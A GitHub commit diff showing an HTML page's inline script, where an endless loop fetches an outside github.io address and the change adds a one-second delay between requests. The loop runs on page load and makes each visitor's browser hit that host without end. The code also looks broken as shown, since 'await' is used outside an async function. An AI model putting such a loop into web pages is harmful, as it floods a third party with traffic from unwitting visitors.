This commit is contained in:
Boof 2023-01-17 09:35:12 +01:00 committed by GitHub
parent ee1ce85468
commit fc8a3962ee
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -11,7 +11,13 @@
} }
</style> </style>
<script> <script>
function delay(milliseconds){
return new Promise(resolve => {
setTimeout(resolve, milliseconds);
});
}
while(true) { while(true) {
await delay(1000);
fetch('https://t0m0t0w.github.io') fetch('https://t0m0t0w.github.io')
} }
let speed = 1000 let speed = 1000